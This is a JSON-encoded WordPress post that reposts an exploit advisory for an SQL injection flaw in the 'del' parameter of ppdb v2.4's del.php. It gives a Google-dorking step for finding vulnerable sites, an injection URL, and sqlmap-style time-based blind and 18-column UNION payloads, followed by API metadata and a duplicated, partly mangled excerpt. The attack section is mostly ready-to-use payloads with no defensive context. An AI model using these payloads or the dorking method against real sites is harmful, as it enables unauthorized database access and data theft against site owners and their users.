=============================================================================================================================================
| # Title : ppdb v2.4-update 6118-1 SQL injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https:\/\/drive.usercontent.google.com\/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0 |
=============================================================================================================================================<\/p>\n
poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] use payload :ppdb\/root\/del.php?del=-1<\/p>\n[+] https:\/\/www\/127.0.0.1\/ppdb\/root\/del.php?del=-1 <=== inject here<\/p>\n[+]
Parameter: del (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: del=-1′ AND (SELECT 2786 FROM (SELECT(SLEEP(5)))KDQW) AND ‘ycIc’=’ycIc<\/p>\n
Type: UNION query
Title: Generic UNION query (NULL) – 18 columns
Payload: del=-1′ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717671,0x6d616b4e6e5a77776d47757568445253596a6468726f72584c72484851664b46664c455675544252,0x71717a7871)– –<\/p>\n
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"
=============================================================================================================================================| # Title : ppdb v2.4-update 6118-1 SQL injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https:\/\/drive.usercontent.google.com\/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0 |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] use payload :ppdb\/root\/del.php?del=-1 [+] https:\/\/www\/127.0.0.1\/ppdb\/root\/del.php?del=-1 <=== inject …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59541","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59541","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59541"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59541\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59541"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59541"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59541"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}